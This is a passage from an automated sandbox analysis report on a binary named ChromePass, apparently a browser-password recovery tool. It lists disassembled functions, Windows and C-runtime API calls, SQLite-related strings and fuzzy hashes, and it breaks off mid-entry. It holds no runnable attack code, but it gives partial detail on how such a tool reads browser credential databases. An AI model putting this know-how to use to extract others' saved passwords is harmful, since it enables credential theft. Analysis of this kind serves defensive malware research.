                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastPointerRead
                                        • String ID:
                                        • API String ID: 64821003-0
                                        • Opcode ID: cac00678367dc1ffc0cc365e7784bde4dd87dc4686d4e8b9d5d24541141ca56f
                                        • Instruction ID: 69adeb8de98025fbfa3a48c9e10f36df1da8062b63096b4fa0374bb7a0929c9d
                                        • Opcode Fuzzy Hash: cac00678367dc1ffc0cc365e7784bde4dd87dc4686d4e8b9d5d24541141ca56f
                                        • Instruction Fuzzy Hash: A8016D72600109FBDB208F68DC86BAB77ADEB043A0F604632F915E76D0D674DD119BE9
                                        Function 0040A849 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A856
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A867
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A877
                                        • LockResource.KERNEL32(00000000), ref: 0040A882
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: ff310cec3ba99e44ab855ab72765dfe61c206a8eafc61545917f87ef2000338e
                                        • Instruction ID: 14b3a58c3e0c40f06e12b542eb8fbad9b2c2feec5bc92fc1ebff960accc3b51d
                                        • Opcode Fuzzy Hash: ff310cec3ba99e44ab855ab72765dfe61c206a8eafc61545917f87ef2000338e
                                        • Instruction Fuzzy Hash: 410184327003156BCB256F95DC8995BBF6AFF85391748D03AEC05DA2A1D770C826CE88
                                        Function 0040A5A3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A5CF
                                          • Part of subcall function 0040525E: _snwprintf.MSVCRT ref: 004052A3
                                          • Part of subcall function 0040525E: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 004052B3
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A5F8
                                        • memset.MSVCRT ref: 0040A602
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0042C47C,?,00002000,?), ref: 0040A624
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: e9e10e8cb14a7a64c4e0591c319302b2ca7c101559e5a295d32660d09392f7ff
                                        • Instruction ID: ab0931b25c1428f86abda644c0656466488a97ae6d1ae9063eea14835faf6012
                                        • Opcode Fuzzy Hash: e9e10e8cb14a7a64c4e0591c319302b2ca7c101559e5a295d32660d09392f7ff
                                        • Instruction Fuzzy Hash: 4A115272600129AFDF116F64EC46E9F7B7AEF04710F5001AAFF05B2161E6359A608F9D
                                        Function 0042B4CF Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00910048), ref: 0042B4D9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55230), ref: 0042B4E9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55A40), ref: 0042B4F9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55638), ref: 0042B509
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 0ee1d2b0c1280dbc801e71a030d8bf5446004e25de82375410634bcceb9cf6b6
                                        • Instruction ID: 41a27a77a8f01ec54f2a8e4239e88027dc7e4243a076cdd9c04db82e030c68a2
                                        • Opcode Fuzzy Hash: 0ee1d2b0c1280dbc801e71a030d8bf5446004e25de82375410634bcceb9cf6b6
                                        • Instruction Fuzzy Hash: 1CE046B0300731979A20AF3ABC80B0733CCAB003583A4A42FF800E7792CF6CDA5080AC
                                        Function 004242F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 925COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: 0
                                        • API String ID: 2221118986-4108050209
                                        • Opcode ID: afa524593e9d91b979767dc81998a397cf429524672ae6708b168924c117268a
                                        • Instruction ID: 1bda766ad6d0aac7714e86e791de8d56a862efed9bf5a6160e1af08104b98622
                                        • Opcode Fuzzy Hash: afa524593e9d91b979767dc81998a397cf429524672ae6708b168924c117268a
                                        • Instruction Fuzzy Hash: 4A825770E00218AFDF10DFA9D881BEEBBB5EF48304F54406AE915A7351D739AE81CB59
                                        Function 0040963E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00409689
                                        • SetCursor.USER32(?,?,?,0040985A,/deleteregkey,/savelangfile), ref: 004096E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Cursor_wcsicmp
                                        • String ID: /stext
                                        • API String ID: 58899023-3817206916
                                        • Opcode ID: 68701aeda6eea5332dba1a685ae2aa12d02637ce021e0d2fc59aca4fedb7f462
                                        • Instruction ID: 69e08b379d7359d5704747f81b5d423444406abbf3e9f2900bc54df1756a9f17
                                        • Opcode Fuzzy Hash: 68701aeda6eea5332dba1a685ae2aa12d02637ce021e0d2fc59aca4fedb7f462
                                        • Instruction Fuzzy Hash: 59216D752142009FD700EF66C88595A77E9EFC8324F14457FFC09DB692DA7AA8018B69
                                        Function 0040595B Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00405A0B,00401F52,?,?), ref: 00405995
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00405A0B,00401F52,?,?), ref: 004059B3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059D1
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059EF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 0e90696c28a97b768179aa07cb3710ff6ae6b02484a7f1fe566f4b362b124399
                                        • Instruction ID: f1e19045f2d6afe60d2eb8405ad52210b2a3be0a5fa56beb63964390426f5968
                                        • Opcode Fuzzy Hash: 0e90696c28a97b768179aa07cb3710ff6ae6b02484a7f1fe566f4b362b124399
                                        • Instruction Fuzzy Hash: FD011EB13417015FE758DB38ED47B6A3690A788358F51713EA907CD1F8EE7448448B48
                                        Function 00423EAC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • a GROUP BY clause is required before HAVING, xrefs: 00423FA2
                                        • aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042405C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-906175814
                                        • Opcode ID: 42f1c003817d01f76a7b329de239f2fa39b0c8ee80e8011f9a6698d2256356b1
                                        • Instruction ID: d6fdc162a0bdf933e5a7984ebb5e25948f3a11b5483ce83de42664a05e09de92
                                        • Opcode Fuzzy Hash: 42f1c003817d01f76a7b329de239f2fa39b0c8ee80e8011f9a6698d2256356b1
                                        • Instruction Fuzzy Hash: 7F51AF71A083119FC720DE25E981A5BB7F4AF88319F95081FF88587342D73CEA45876A
                                        Function 00421CCC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: e$statement too long
                                        • API String ID: 2221118986-303685292
                                        • Opcode ID: 794dd4ba030559d7e74f9912c9dd4bfa6078ac8d3ca22890e26558b5c9222f75
                                        • Instruction ID: b19cad5e121c7a63733cb21393a521153f1a01f8c8e8d0239ac9277f8eaca46a
                                        • Opcode Fuzzy Hash: 794dd4ba030559d7e74f9912c9dd4bfa6078ac8d3ca22890e26558b5c9222f75
                                        • Instruction Fuzzy Hash: 01518671A00228EFDF21DF54DC91BDE77B4AF15304F5000ABE90867251D7786E85DB99
                                        Function 00421733 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • atoi.MSVCRT(00000000,sqlite_master,?,?,?,?,00421871,?,00000003,?,00000000,00000000,?), ref: 0042179C
                                        • atoi.MSVCRT(00000000,sqlite_master,?,?,?,?,00421871,?,00000003,?,00000000,00000000,?), ref: 0042181E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: atoi
                                        • String ID: sqlite_master
                                        • API String ID: 657269090-3163232059
                                        • Opcode ID: f5aa0c6a605ab96f8dc057e4af25762ce8ae3f246fd78d67583255fa01c05cdf
                                        • Instruction ID: 30ef85cfd03b586ed0434af1063668c4d226d1f32ee0794736749da60052fe85
                                        • Opcode Fuzzy Hash: f5aa0c6a605ab96f8dc057e4af25762ce8ae3f246fd78d67583255fa01c05cdf
                                        • Instruction Fuzzy Hash: C0313A32704251AFDB259F22E881B26B7D1EFA4314F64402FE8058B271DB39E841C7D9
                                        Function 0042A7BB Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 0042A7E2
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        Strings
                                        • bad parameters, xrefs: 0042A83C
                                        • Unable to delete/modify user-function due to active statements, xrefs: 0042A81F
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpystrlen
                                        • String ID: Unable to delete/modify user-function due to active statements$bad parameters
                                        • API String ID: 3412268980-1262664748
                                        • Opcode ID: 4750ac4f64df20fe14f20581181399b441305fd699aa432eca9752a195267de7
                                        • Instruction ID: e2583e71bc0324cef428d3d908088a87ccf9ef41c9de883cf6763ad4d955ad6f
                                        • Opcode Fuzzy Hash: 4750ac4f64df20fe14f20581181399b441305fd699aa432eca9752a195267de7
                                        • Instruction Fuzzy Hash: 8A21B470700251EFDF24AF20A841BAB77A1AB04744F50402FFD058A282E779CDE2C69B
                                        Function 0040B0A5 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: malloc$CriticalLeaveSection
                                        • String ID:
                                        • API String ID: 3071071276-0
                                        • Opcode ID: ddd45cabfc29e04858f3b4a54179dc07d1ab7b7d7c2a11ea6175609c0dbd8c76
                                        • Instruction ID: 58a28df5d68d4c32b227e5c0aefb609fd1eaf3578d0e6b8a1ed8ab7e9c64f7f4
                                        • Opcode Fuzzy Hash: ddd45cabfc29e04858f3b4a54179dc07d1ab7b7d7c2a11ea6175609c0dbd8c76
                                        • Instruction Fuzzy Hash: 7F117CB3A00A108BC724DB14ECE185A73E9FB48BD4315653FE824E73A1C7B898418BDD
                                        Function 0040D4AC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AttributesFilefree
                                        • String ID:
                                        • API String ID: 1936811914-0
                                        • Opcode ID: 1b55a115b6651d074f8abd2a18ce25ff18cbd72e89a4077e0e2222b355676b88
                                        • Instruction ID: f03d147386478639c031dd4aab21c4ee59dd6ac5a3055defa47c866c469ca497
                                        • Opcode Fuzzy Hash: 1b55a115b6651d074f8abd2a18ce25ff18cbd72e89a4077e0e2222b355676b88
                                        • Instruction Fuzzy Hash: 3CF0C836D00515FBCB205FFDDD056AF7A649B40328B24013BFC16F62C0EA38AD069268
                                        Function 00404AE7 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCRT ref: 00404B03
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004027D0,00000002,?,?,?,00401DD0,?), ref: 00404B1B
                                        • free.MSVCRT ref: 00404B24
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 4ec0a3633af83db2ef3e3f5a0b741c4b76ce56ff2941dd1a7c9ab502857e5d05
                                        • Instruction ID: 7d81a51da6d272be3227bb4bca0c31c89fe0157254a78abba71958b2e05c0512
                                        • Opcode Fuzzy Hash: 4ec0a3633af83db2ef3e3f5a0b741c4b76ce56ff2941dd1a7c9ab502857e5d05
                                        • Instruction Fuzzy Hash: 48F089B37052229FC7189A75B94185BB3ADAF84325751442FF904D7281D738EC50C7A9
                                        Function 0040E72B Relevance: 3.2, APIs: 2, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040E7E4
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040E836
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: a96fc410173db621db0d4444a8ae677d8faef3f4941332292e50b7516178888b
                                        • Instruction ID: f055bcdf697316c0d5fcd3c93f3fcec89edffe739f3a922271ec41f17ae25e25
                                        • Opcode Fuzzy Hash: a96fc410173db621db0d4444a8ae677d8faef3f4941332292e50b7516178888b
                                        • Instruction Fuzzy Hash: 9E617175B00606EFDB14DFB6C880AAEB7B4FF48314F10456AE914A7381D738AD64DB94
                                        Function 00410DF6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,00000000), ref: 00410E60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID: SQLite format 3
                                        • API String ID: 1475443563-759114288
                                        • Opcode ID: d35fd90adc4eca7626042c513d7ca5ff2d4b7392b5192c198e11bac51d5f790c
                                        • Instruction ID: 7a948cabf6688ffad0fb851a8221fe331fddf99336a370c70b7dc6847946aa22
                                        • Opcode Fuzzy Hash: d35fd90adc4eca7626042c513d7ca5ff2d4b7392b5192c198e11bac51d5f790c
                                        • Instruction Fuzzy Hash: F541C2719047459EC720CFA6C5417EABBF0AF18304F140A5FD491D7642E3B8EAC5DBA5
                                        Function 00407D38 Relevance: 3.1, APIs: 2, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406B39: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406B5B
                                          • Part of subcall function 00406B39: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00406BF0
                                          • Part of subcall function 00404857: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00407BBD,?), ref: 00404869
                                        • CloseHandle.KERNELBASE(?), ref: 00407E1E
                                        • SetCursor.USER32 ref: 00407E2A
                                          • Part of subcall function 0040523F: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,004022C7,?,?,00000000,?), ref: 00405256
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateCursorHandleWrite
                                        • String ID:
                                        • API String ID: 2042149353-0
                                        • Opcode ID: 3a6ace903472f4d56c57e321bc51bb5f79d762c189b85c980400dd9ebe6d50e2
                                        • Instruction ID: b242dfafaea419cf09a864ada9b1743c0dadae4235e2c8f1285360d2b2f17e01
                                        • Opcode Fuzzy Hash: 3a6ace903472f4d56c57e321bc51bb5f79d762c189b85c980400dd9ebe6d50e2
                                        • Instruction Fuzzy Hash: 05319671B04100AFCB256F69CC89E6E7BA5AF84314F11447FF446A72D1CB39AD80CA99
                                        Function 0040F4C6 Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040F69D
                                        • memcmp.MSVCRT(?,00000000,00000010,?,00000000,00000000,?,00000000,004118FC,00000000,00000048,00000000,00000000,00411A7F,00000048,00000000), ref: 0040F6B2
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
